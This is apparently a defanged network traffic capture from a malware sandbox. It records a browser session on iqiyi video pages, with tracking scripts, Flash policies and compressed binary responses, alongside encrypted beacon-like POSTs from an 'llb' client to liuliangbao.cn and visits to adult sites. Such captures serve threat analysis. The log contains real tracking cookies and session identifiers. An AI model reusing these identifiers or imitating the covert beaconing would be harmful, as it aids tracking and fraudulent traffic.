2p)2j 2t;1J(!(2p&2q)){2t =2J.2P(2p);1H}2C=2D[2E  ]&63;1J((2p&3n)==2T){
2t =2J.2P((2p&31)<<6|2C);1H}2K=2D[2E  ]&63;1J((2p&7w)==3n){2<<< skipped >>>

GET /js/pingback/qa.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: static.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109


HTTP/1.1 200 OK

Content-Type: text/javascript

Accept-Ranges: bytes

ETag: "1636393741"

Last-Modified: Tue, 27 Dec 2016 09:10:53 GMT

Content-Length: 19399

Server: Apache 1.3.29

Cache-Control: max-age=300

Expires: Fri, 20 Jan 2017 10:00:09 GMT

Date: Fri, 20 Jan 2017 09:55:09 GMT

Connection: keep-alive
Object.extend=function(t,e){for(var i in e){t[i]=e[i]}return t};window
.lib=window.lib||{};if(!lib.SITE_DOMAIN){var getDomain=function(){var 
t=2;var e=window.location.hostname.split(".");e=e.slice(e.length-t);re
turn e.join(".")};lib.SITE_DOMAIN=getDomain()}lib.PROJECT_VERSION="201
61227171021";lib.developer="liujinjuan";lib.action=lib.action||{};lib.
action.Qa=function(){this.init=function(t){var e=this;var i=lib.SITE_D
OMAIN.match(/pps/);try{var r;var o=navigator.userAgent.toLowerCase();t
his.par={};this.pars=[];this.custom={};this.filter=[];this.time=0;this
.w=window;this.l=window.location;this.d=window.document;this.urlMap={r
dm:"rdm",qtcurl:"qtcurl",rfr:"rfr",lrfr:"lrfr",jsuid:"jsuid",qtsid:"qt
sid",ppuid:"ppuid",platform:"platform",weid:"weid",pru:"pru",flshuid:"
flshuid",fcode:"fcode",ffcode:"ffcode",coop:"coop",odfrm:"odfrm",fvcod
e:"fvcode",mod:"mod"};this.cookieMap={flshuid:"QC005",jsuid:"QC006",pr
u:"P00PRU",lrfr:"QC007",qtsid:"QC008",QY_FC:"QC009",QY_FFC:"QC014",gaf
lag:"QC011",odfrm:"QC132",QY_FV:"QC142"};t=t||{};this.times=t.times||5
;this.timeouts=t.timeouts||1e3;this.url=t.url||window.location.protoco
l "//msg.71.am/jspb.gif";if(this.url.indexOf("?")==-1){this.url ="?"}e
lse if(this.url.slice(-1)!="&"){this.url ="&"}this.flag=t.flag||"QC010
";this.callback=t.callback||function(){};if(typeof t.urlMap=="object")
{Object.extend(this.urlMap,t.urlMap)}if(typeof t.cookieMap=="object"){
Object.extend(this.cookieMap,t.cookieMap)}if(typeof t.custom=="object"
){Object.extend(this.custom,t.custom)}if(t.filter instanceof Array<<< skipped >>>

GET /js/pingback/iwt.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: static.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109


HTTP/1.1 200 OK

Content-Type: text/javascript

Accept-Ranges: bytes

ETag: "60576269"

Last-Modified: Tue, 27 Dec 2016 09:10:53 GMT

Content-Length: 8951

Server: Apache 1.3.29

Cache-Control: max-age=300

Expires: Fri, 20 Jan 2017 10:00:10 GMT

Date: Fri, 20 Jan 2017 09:55:10 GMT

Connection: keep-alive
(function(t,e,r){var i=false,n=/msie/.test(navigator.userAgent.toLower
Case()),o="hXXp://iqiyi.irs01.com/irt?_iwt_id=",s="hXXp://irs01.net/MT
FlashStore.swf#",a="hXXp://irs01.com/_iwt.gif",f="_iwt_id",u="_iwt_cid
",c="",h="",l="",d=e.getElementsByTagName("head")[0],p={available:fals
e,guid:function(){return["MT",( new Date v  ).toString(36),(Math.rando
m()*1e18).toString(36)].join("").slice(0,16).toUpperCase()},get:functi
on(t,e){return p._sendFlashMsg(e,"jGetItem",t)},set:function(t,e,r){re
turn p._sendFlashMsg(r,"jSetItem",t,e)},clear:function(t,e){return p._
sendFlashMsg(e,"jClearItem",t)},clearAll:function(t){return p._sendFla
shMsg(t,"jClearAllItems")},_sendFlashMsg:function(e,r,i,n){e=e||k;var 
o=p.guid();t[o]=e;switch(arguments.length){case 2:b[r](o);break;case 3
:b[r](i,o);break;case 4:b[r](i,n,o);break}},initSWF:function(t,e){if(!
p.available){return e&&e()}if(p.inited){return t&&setTimeout(t,0)}t&&m
.push(t);e&&g.push(e)}},v=1,m=[],g=[],w="",_,b,y,I=e.createElement("DI
V"),C=p.guid();function k(){}function j(e){if(i){if(t.console&&t.conso
le.log){t.console.log("MTFlashStore:" e)}}}if(!t._iwt_no_flash){try{_=
t.navigator.plugins["Shockwave Flash"]||t.ActiveXObject;w=_.descriptio
n||function(){return new _("ShockwaveFlash.ShockwaveFlash").GetVariabl
e("$version")}()}catch(A){}w=(w.match(/\d /g)||[0])[0];if(w<9){p.av
ailable=false}else{p.available=true;t[C]=function(e,r){switch(e){case"
onecall":if(!t[r])return;t[r].apply(t,[].slice.call(arguments,2));dele
te t[r];break;case"error":p.available=false;while(y=g.shift()){y()<<< skipped >>>

GET /crossdomain.xml HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: static.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; QC007=DIRECT; QC006=o5rodndzg8of8s4mwfefai5c; QC008=1484906110.1484906110.1484906110.1


HTTP/1.1 200 OK

Content-Type: text/xml

Accept-Ranges: bytes

ETag: "1691341"

Last-Modified: Mon, 05 Jul 2010 06:25:32 GMT

Content-Length: 227

Server: Apache 1.3.29

Cache-Control: max-age=600

Expires: Fri, 20 Jan 2017 10:05:11 GMT

Date: Fri, 20 Jan 2017 09:55:11 GMT

Connection: keep-alive

Access-Control-Allow-Origin: *
<?xml version="1.0"?>....<cross-domain-policy> <site-co
ntrol permitted-cross-domain-policies="all" />..    <allow-acces
s-from domain="*" /> ..    <allow-http-request-headers-from doma
in="*" headers="*"/>..</cross-domain-policy>....


GET /ext/common/Tipdatavod_201610311735.xml?n=0.2173128924332559 HTTP/1.1

Accept: */*

Accept-Language: en-US

Referer: hXXp://VVV.iqiyi.com/common/flashplayer/20170119/1050f98c2359.swf

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: static.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; QC007=DIRECT; QC006=o5rodndzg8of8s4mwfefai5c; QC008=1484906110.1484906110.1484906110.1


HTTP/1.1 200 OK

Content-Type: text/xml

Accept-Ranges: bytes

ETag: "1630103149"

Last-Modified: Mon, 31 Oct 2016 09:35:23 GMT

Content-Length: 13382

Server: Apache 1.3.29

Cache-Control: max-age=600

Expires: Fri, 20 Jan 2017 10:05:12 GMT

Date: Fri, 20 Jan 2017 09:55:12 GMT

Connection: keep-alive

Access-Control-Allow-Origin: *
...<root>...<!--............ .Shawn.X-->...<!--1. .....
...................:2012...12...28...                                 
                                          -->...<!--2. ......tip
..............................:                                    --&
gt;...<!--   type=1, ........., signal......, ..............., ....
................................      -->...<!--   type=2, .....
................... ;                                     -->...<
;!--3. changed...1.....................tips.........tip...vv..........
.....                                 -->...<!--   changed...2..
................tips...startPlay...............                       
                -->.....<item id="NextVideo" level="1" duration=
"15" type="1">....<conditions>.....<fields>......<fi
eld name="curADState" operator="eq" value="false"/>.....</fields
>.....<frequency count="100">......<restrain name="day"/&g
t;.....</frequency>....</conditions>....<list>.....&
lt;message>......<![CDATA[......tipsdata_next_video..           
 ]]>.....</message>....</list>...</item>...<it
em id="SwappingDef" level="10" duration="-1" type="1">....<condi
tions>.....<fields>......<field name="curADState" operator
="eq" value="false"/>.....</fields>.....<frequency count="
100">......<restrain name="day"/>.....</frequency>....&
lt;/conditions>....<list>.....<message>......<![<<< skipped >>>

GET /js/common/ares2.min.js?1484906115570 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: static.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; QC007=DIRECT; QC006=o5rodndzg8of8s4mwfefai5c; QC008=1484906110.1484906110.1484906110.1; QC005=5088e17771f6d54476f95dc61f9e80b4; QC010=137349363; T00404=9b9366963d49845dcaef1cf22d487ad8


HTTP/1.1 200 OK

Content-Type: text/javascript

Accept-Ranges: bytes

ETag: "594241217"

Last-Modified: Fri, 11 Mar 2016 02:10:08 GMT

Content-Length: 107787

Server: Apache 1.3.29

Cache-Control: max-age=300

Expires: Fri, 20 Jan 2017 10:00:16 GMT

Date: Fri, 20 Jan 2017 09:55:16 GMT

Connection: keep-alive
/*! @cupid/ares-old@2.13.111 by iQiyi */.!function(t){function e(r){if
(n[r])return n[r].exports;var i=n[r]={exports:{},id:r,loaded:!1};retur
n t[r].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var n={};re
turn e.m=t,e.c=n,e.p="",e(0)}([function(t,e,n){t.exports=n(16)},,,,,,,
,,,,,,,,,function(t,e,n){(function(e){function r(){var t=e.ares;t&&t.v
ersion||(e.ares=a,e.CupidAdSdk=o)}function i(){return null!=document.g
etElementById("flashbox")}var o=(n(17)("compat"),n(30)),a=n(52);n(18);
"function"==typeof e.define?i()||e.define("ares",function(){return o})
:t.exports=o,r()}).call(e,function(){return this}())},function(t,e,n){
var r=n(18),i=n(29);t.exports=e=r.memoize(i),i.prefix="ad:ares:",i.ini
t("aresde")},function(t,e,n){t.exports=n(19)},function(t,e,n){function
 r(t){return this instanceof r?(this.__value=t,void(this.__chain=!1)):
new r(t)}var i=n(20);t.exports=i.extend(r,i),n(22),n(23),n(24),n(26),n
(27),n(28),r.mixin(r,r)},function(t,e,n){function r(t){return null!=t?
t.length:void 0}function i(t,e){var n=r(t);if(n&&f.fn(e))for(var i=0;n
>i&&!1!==e(t[i],i,t);i  );return t}function o(t,e){var n=-1;return 
i(t,function(t,r,i){return e(t,r,i)?(n=r,!1):void 0}),n}function a(t){
var e=[];return i(t,function(t){e.push(t)}),e}function s(t){if(t){var 
e=h.call(arguments,1);i(e,function(e){l(e,function(e,n){f.undef(e)||(t
[n]=e)})})}return t}function c(t){return function(){return!t.apply(thi
s,arguments)}}function u(t,e){return f.str(t)?t.indexOf(e):o(t,functio
n(t){return e===t})}function d(t,e,n){return i(t,function(r,i){n=e<<< skipped >>>

GET /jp/recommend/videos?referenceId=572044000&albumId=0&cookieId=o5rodndzg8of8s4mwfefai5c&channelId=10&withRefer=false&area=swan&size=10&type=video&trimUser=false&pru=&playPlatform=PC_QIYI&callback=window.Q.__callbacks__.cbg39tfk HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: mixer.video.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; QC007=DIRECT; QC006=o5rodndzg8of8s4mwfefai5c; QC008=1484906110.1484906110.1484906110.1; QC005=5088e17771f6d54476f95dc61f9e80b4; QC010=137349363; T00404=9b9366963d49845dcaef1cf22d487ad8; QC118={"color":"FFFFFF","channelConfig":0}


HTTP/1.1 200 OK

Server: openresty/1.9.15.1

Date: Fri, 20 Jan 2017 09:55:17 GMT

Content-Type: application/json; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Expires: Fri, 20 Jan 2017 09:55:16 GMT

Cache-Control: no-cache

Access-Control-Allow-Credentials: true

Content-Encoding: gzip
15e0.............]Ys.G.~._...L.M.}x.l.:...Y..gb7...F.Aa..0..\."HK./.ZR
.-..)J..cDI.e..5..<./.W}...H.@R...)...:........e./.....P..z..t-..h.
.l__.....\..o...\....sF..<d.-.A(;.%C=.H^.h.....-....1-...Gc.H.>.
.W.a.X.....)."KFD...... *....m..Z.E_...$....../C...x......./C.T>..H
...1....Q.(3.....R.....9.RT.g....7.u)n....a..o(.Mn]...*E.9Im,.Mn].....
#...utQ.....9..."....E..[....J.UEV.{.&......E.A.....Vr.R..6].A....:..K
qs\.].......O.-.5R....u)...0qB?.L.....]...y...#....Y}R~.me..{.....{d.1
87jd.L<....x....|.... ...wn....S,..7W. /...ba.|~......:..%;..g..y.{
. ...>>....xZ....L.6F........W..c.)..GF_. s...d~._..KN..n_.,...x
..#K..}s{..S,...C....q..m..]2.R,,Tn..J.f.../..........^.l.......z...{.
.#2.]....n..f.......XxT,|W,......^......W......z..9.QZ=,o] ......).Y".
.V..3g..'^.................5.[.f..........V...gd........b....}J.g...U.
..u..<..y.S:..%.........6...Q..F;i.fv.....u........}.|....n..nq.R.|
5a.R..........Det.<s.|........Y..h.. ....NY=.#y>...........6...6
........W.Ik/..[.v.....Dby..9..X.5'7Jk#.$>.d.....%......uo.....u.T/
_#.9}.D...*... .\'S..y..{w...6..So.f.~..x...d...!.......3...r......|.z
.w.......r..\.N.'.G7*..A.29S,."s...(FV.@F.B.G......'...7.FK.......q...
..e...d....#.u....B'........es.2.......icV.x.oS.X.S...9.b.......o.G...
Isr...Z..R..WZ.KK{.....k.#......i..'c;.8d}..y.?a.......O.......G.v..8(
O?.o>/.\A...u.......@..^0Iu.....|y..2.P,L......:S.a.?....G..y..5..v
..d.A.`...,..Vk....=...`.s~............=..8..4.e....&.lL...........$!.
7...2^......CCC......^=5...c.LF..!F....H {:.....'!.H.(J=!-...4.n..<<< skipped >>>

GET /jp/mixin/videos/572044000?callback=window.Q.__callbacks__.cbae6bg&status=1 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: mixer.video.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; QC007=DIRECT; QC006=o5rodndzg8of8s4mwfefai5c; QC008=1484906110.1484906110.1484906110.1; QC005=5088e17771f6d54476f95dc61f9e80b4; QC010=137349363; T00404=9b9366963d49845dcaef1cf22d487ad8; QC118={"color":"FFFFFF","channelConfig":0,"hadTip":1}


HTTP/1.1 200 OK

Server: openresty/1.9.15.1

Date: Fri, 20 Jan 2017 09:55:21 GMT

Content-Type: application/json; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Expires: Fri, 20 Jan 2017 09:55:20 GMT

Cache-Control: no-cache

Access-Control-Allow-Credentials: true

Content-Encoding: gzip
708.............Wms....._...d."..|S>.N=u.'N.d..t8G.H....;.4....X...
.<..%uk'..x. V.7z....@......HAR..3...9.n...}.../..}.6y?.N.^...4.}N.
.y.Ah..~uR.y.j.....-.5.O..I.%]..z..h.Z.t'|.it....W~?&}"..K..l......p._
.......Si.....?i.-}..].....:....G_..]..o^.._........5..hq=....~)k..n..
7.......m]..W.;......<.....m... .......^...=.=~.}.5...|.--. .......
8x4...}..1..fiwa..8.u7.|!................hi5.9..hi!.~...\.A..>.....
..n/...v.......hk.....\~.dS./U..e..9...Y.T .Q.UM.J.U.EL.d.t..6......p`
a....B.....y6`y.w...Q...g.....]..{......k.F..TL ....t..O.....7r.-.n.M&
..O...|.9....@.s.{.n.}..vwh..;`.l...\f...../C.....3.4.qe........x....M
.C...0...8........y.5.D..!..]H...3.H*0m0|.^....Y.x.i4.,.\.. ..j.E.mW..
E..*....../.u...b.`......1u..U..aTj0...?...F@'......X.;..Qh...)*...U..
V.m=.RO..........}.C.`-F....w).J..B.......pe)..........I....W.bV.;&...
....2....(P.K]..D{^...{.....8`........nM..."..T.({C..D.U7}..X...b.Q4..
S-.X...b.[.Z.d5....U....u..5..1).z....V.V....D%l.....R%..d.n. 0".I.P..
.|.....P0."...&..[I1./.. ...e.]...H..S;u...~.o_....b.V...!..Z..a.@pJxu
#....hw..R.e...8.....MLO.'..BO8.....CU...<...@..`..j.1..e...... ..N
...S).....p8....d.!a=.D...@.4/...,.(....`;.d=.}..i.........O\u.Y6.r...
#8...KY..v..0....=>AaJ...i..*I.....q.S...F..@z...>.L!Di.....j...
..B.<-x3...(..#^?U-%..P....v..h......;......D..@..w.Itsfg..8..[T>
;....<P.B.0/@.2....S......2a..9#W.Y9..3.L.qBP.b'.7..!...7.T...Y..4(
.J"....)ffNv.L.I...w..;\....KF&1:ts........x.]..&...c..P.w.I:.........
e3...y.._.V.BeIr-.M.<..f..=..>u..#l......V...w...j&\.T......<<< skipped >>>

POST /as/c/f8/ HTTP/1.1

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

User-Agent: llb/1.1.73.813

Host: ap5.liuliangbao.cn

Content-Length: 1206

Connection: Keep-Alive

Cache-Control: no-cache

d=9c6a6369b0e924e65c507e6e9cd625fd444fa6c00372a00ac9f9ba39ca27eb551ef815ec2a80638351695c91307d2965418782bf8d02501b0d4a4abee66483ec50f6b988e1c0d48eead1630f59ea474fde96eec895cae58122d9b6fa0b8faa734672619a63bdb11f5cb97f5f0a02edf7d1d6e98747ece5c1f83dd3dc2b29fe4e5fc5d285e2e23405e637e10f6c6594dbe1bc159a4a19b47d6181cde4876b650746fe38846bb40d601efb369c5cbc67011593bfa58b5ead4f8e5b8e418412c95432f6499cf92efee79642461cecac2f7125d595435adc9383ecf60300b76434653b33fc835243c98a0fe56c6bd6e6154f0b592fbc1f8589148bcbcf3a05416bf562564bccacbf6b3808b43cc93850ea6e677834375d5fd531d3cf96468d7bbc3bad8bc9e39249a24b1469d3a59b7ab7b401aad5d244b03a4a7c9dd05ab4397cdf36914eee4b7a7bd63b1f6b1daac0ce991dad1a278d5c08d9831c88d813580cbd6f6114f94413e539d4331bd444aa07f2e4f667786bbf8e2491b4a6810f27192b1a329579a67110fa6a97320a6b6071e227d6e4cd7693c7c1c8a353ea6d5eded17929cee65fa2bead122f77eb57192cd26ad24ae17fefc9392a2d3b53b5e88a3e62494ab2f4081eeb3a10a867bb822f57580475005b34458092cca7b66ee0eb9589307218c49a88f065230054c50d27d8289e77bec69ae150d8b9fb8ef173b6e3bd2d0f5bc2963d90fbcb666c4d6539da2996e40e06945d80573876050d53ef416e36776f17c435ba96eedc9373f6e9cce72e36b5b3fda804c8c65a107f011bd7a947cdaf7cf927ae989877a6e37d801bccc12cab7813163307c5
HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:04 GMT

Content-Type: text/html;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Content-Encoding: gzip

52.................!...J."p..1...?.......'..6...2...U7..81.'6...b....g
.Q.).......uP.....0......

POST /as/c/f11/ HTTP/1.1

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

User-Agent: llb/1.1.73.813

Host: ap5.liuliangbao.cn

Content-Length: 152

Connection: Keep-Alive

Cache-Control: no-cache

d=788bb42704101c171492800c59e2e304523c1c630e69e78957c22660af9d6f2b42b741d3a0dee29de862f12cc5af0d3ed1799289b91ca88a9503179a2d994b2464ac13e1dffed7c0b61bd9
HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:05 GMT

Content-Type: text/html;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Content-Encoding: gzip

59.................!....dU..L,.[.....d...O......%^....E.D..Z.%._..)..{
..J0.Cl`..m#Q.. Z%.Z.....0..HTTP/1.1 200 OK..Server: nginx..Date: Fri,
 20 Jan 2017 09:55:05 GMT..Content-Type: text/html;charset=UTF-8..Tran
sfer-Encoding: chunked..Connection: keep-alive..Content-Encoding: gzip
..59.................!....dU..L,.[.....d...O......%^....E.D..Z.%._..).
.{..J0.Cl`..m#Q.. Z%.Z.....0......

POST /as/2/h5/ HTTP/1.1

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

User-Agent: llb/1.1.73.813

Host: ap5.liuliangbao.cn

Content-Length: 206

Connection: Keep-Alive

Cache-Control: no-cache

d=607c15ede15cafbd83bb277a7d7e4961603affb1f5f4d8e08f09be352e7da44e6340fb8b177c2ba3a36e238452a3eb22fa492454770726463e35bec1cfc916e965acb47e79fa4ad5fa10dc85944854301232f4c2a43b4880239815bb8013a43918dedb0ceed2
HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:11 GMT

Content-Type: text/html;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Content-Encoding: gzip

54.................!.........2...?........bNjD.kI...|....%.A#.....pd.t
....e.r...}..&P.....0..HTTP/1.1 200 OK..Server: nginx..Date: Fri, 20 J
an 2017 09:55:11 GMT..Content-Type: text/html;charset=UTF-8..Transfer-
Encoding: chunked..Connection: keep-alive..Content-Encoding: gzip..54.
................!.........2...?........bNjD.kI...|....%.A#.....pd.t...
.e.r...}..&P.....0..

GET /crossdomain.xml HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: cmts.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; QC007=DIRECT; QC006=o5rodndzg8of8s4mwfefai5c; QC008=1484906110.1484906110.1484906110.1; QC005=5088e17771f6d54476f95dc61f9e80b4; QC010=137349363


HTTP/1.1 200 OK

Server: QWS

Date: Fri, 20 Jan 2017 09:55:18 GMT

Content-Type: text/xml

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Expires: Fri, 20 Jan 2017 09:56:07 GMT

Cache-Control: max-age=300

Last-Modified: Tue, 29 Jul 2014 02:59:46 GMT

X-Cache: EXPIRED from 119.188.144.242

Content-Encoding: gzip

X-Cache: HIT from 119.188.145.8

5e.............I../..M..M...-...L.....I.../.MLNN......*@..*i..fVf.%..*
..R.I....b..2........,........0..HTTP/1.1 200 OK..Server: QWS..Date: F
ri, 20 Jan 2017 09:55:18 GMT..Content-Type: text/xml..Transfer-Encodin
g: chunked..Connection: keep-alive..Vary: Accept-Encoding..Expires: Fr
i, 20 Jan 2017 09:56:07 GMT..Cache-Control: max-age=300..Last-Modified
: Tue, 29 Jul 2014 02:59:46 GMT..X-Cache: EXPIRED from 119.188.144.242
..Content-Encoding: gzip..X-Cache: HIT from 119.188.145.8..5e.........
....I../..M..M...-...L.....I.../.MLNN......*@..*i..fVf.%..*..R.I....b.
.2........,........0..

GET /trade HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://zooxxxfree.com/

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: pornvideo-box.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:05 GMT

Server: Apache/2.4.10 (Debian)

Content-Encoding: gzip

Vary: Accept-Encoding

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: text/html; charset=UTF-8
bfd.............\.s........8..I......e......%...\?e@..p&...Z.3..w.|...
..N...N$.b..................n..............w..i../......Lo.u.=r.h.57.{
..C..1..ug.Yg6.H5qo?.S..{.8k.a.9._.N...9ep....&..?J..{..$..........T..
..)W.Pc/l.6...2|En.D.I..,8UD...;Z...O.........O.D..-.Q..c.o8k..Jz...JF
H....^......E..C.....X..B..$L....p<.y~#N.....p.p<.hm.C.n.s{..^Mx
dDD..J.Gx.2B[..m...c8i..q...gB9...-....b.tw*Q.....&P..:....B...A.....(
0..~.H....U...xNCO.1./.&i.....|....D(<k..-..... ..R*3UR..`..u..Z.LC
.....L.Q.!1.<...._.Ki.....w...A.s1..Ak..<.....;.eQ..I...F.......
.". ....&\......|....!BO.Q.y.......T)h..N..K...?.i..|...1x*j...!..1...
......'|..$v..==.hOhN'@ ...h.#.J.......d..a..........mQ0{z..T..h.@....
..u..Q...rC.n!.9.k_....!...8...#t...?B.1.....^....)E.L03.1~/|....%`.#h
..>.......6....O....x`..B..........s\...4..D..|=...~..1!!z[4$.cb...
i &p..L\..1....P..!y.Nt...T.Rc..B.....svL>...!....h.3..(`..I$#^iH.7
.......<...v....%..^."..s.......io.@.......=.L.o.7....... .r....r-m
........o..n.=.F.f...6....-...%...8....18-6.*<..Y]L..p.Wd.~.9sh-..0
.F...L..T0.#h..F........txqp.......L....S...D.`..m..9W....E.~*2..BW.Z.
R.N.g...e...eTm..........@...9.|......:..B.[...K.w..A....R.Z....d....p
.B....u.L.l..f...)n..........P.\.....V..I...e"....s..].0..B]....g.....
tW.$.*.V......CM....3..C.u..,6.)...TK....].Z@o1....|".P.m/.h.,...|..z%
*...2...k...........G^...z...:.$....[w$.in.......;..O...B=LFB..*..I1Ec
..>.Z...C..K....3..T.*r..%_$r...'...m..$.x08.0..=@.H....A<..d.F.
....C..^...;|yS.....~*Q...ySg.V.......AyJ.Z.%.i.....-...Y.......s.<<< skipped >>>

GET /apis/urc/getqd?authcookie=null&containsUgc=1&agent_type=1&subTypes=1,7,9&channelIds=1,2&callback=window.Q.__callbacks__.cbji48aq HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: nlwl.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; QC007=DIRECT; QC006=o5rodndzg8of8s4mwfefai5c; QC008=1484906110.1484906110.1484906110.1; QC005=5088e17771f6d54476f95dc61f9e80b4; QC010=137349363; T00404=9b9366963d49845dcaef1cf22d487ad8


HTTP/1.1 200 OK

Server: Tengine

Date: Fri, 20 Jan 2017 09:55:15 GMT

Content-Type: text/plain;charset=UTF-8

Content-Length: 162

Connection: keep-alive

Accept-Charset: utf-8

Access-Control-Allow-Credentials: true
try{ window.Q.__callbacks__.cbji48aq ( {"data":{"qidan_home":[],"dingy
ue":[],"data":[],"qidan_cnt":0,"watchlater":[],"playlist":[]},"code":"
A00000"});}catch(e){} HTTP/1.1 200 OK..Server: Tengine..Date: Fri, 20 
Jan 2017 09:55:15 GMT..Content-Type: text/plain;charset=UTF-8..Content
-Length: 162..Connection: keep-alive..Accept-Charset: utf-8..Access-Co
ntrol-Allow-Credentials: true..try{ window.Q.__callbacks__.cbji48aq ( 
{"data":{"qidan_home":[],"dingyue":[],"data":[],"qidan_cnt":0,"watchla
ter":[],"playlist":[]},"code":"A00000"});}catch(e){} ..

GET /static/js/geetest.5.10.0.js HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: static.geetest.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:19 GMT

Content-Type: application/javascript

Content-Length: 41176

Connection: close

Cache-Control: max-age=86400

ETag: 9d2c21d61e8e2772cfb4a513b8b67572

Expires: Sat, 21 Jan 2017 03:41:27 GMT

Access-Control-Allow-Origin: *

Accept-Ranges: bytes

X-Varnish: 2921431203 2920383179

Age: 22431

